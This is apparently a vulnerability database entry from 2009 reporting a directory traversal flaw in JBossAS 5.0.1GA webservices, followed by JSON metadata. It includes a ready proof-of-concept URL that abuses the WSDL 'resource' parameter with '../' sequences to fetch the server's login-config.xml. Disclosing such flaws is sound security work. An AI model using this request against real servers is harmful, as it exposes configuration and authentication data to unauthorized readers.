Description
JBossAS 5.0.1GA
Simple webservice "hello" from docs + imported XSD-schema.
Any user can get ANY XML from server:
http://127.0.0.1:8080/echo/Echo?wsdl&resource=../../../conf/login-config.xml
{"id": "SECURITYVULNS:DOC:21699", "bulletinFamily": "software", "title": "Jboss dir.traversal", "description": "\tJBossAS 5.0.1GA\r\nSimple webservice "hello" from docs + imported XSD-schema.\r\nAny user can get ANY XML from server:\r\nhttp://127.0.0.1:8080/echo/Echo?wsdl&resource=../../../conf/login-config.xml", "published": "2009-04-19T00:00:00", "modified": "2009-04-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21699", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:30", "edition": 1, "viewCount": 8, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9857"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9857"]}]}, "exploitation": null, "vulnersScore": 0.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645605304, "score": 1659803227}, "_internal": {"score_hash": "ca996895af2e8363dced8dd9aadf7223"}}
{}
Jboss dir.traversal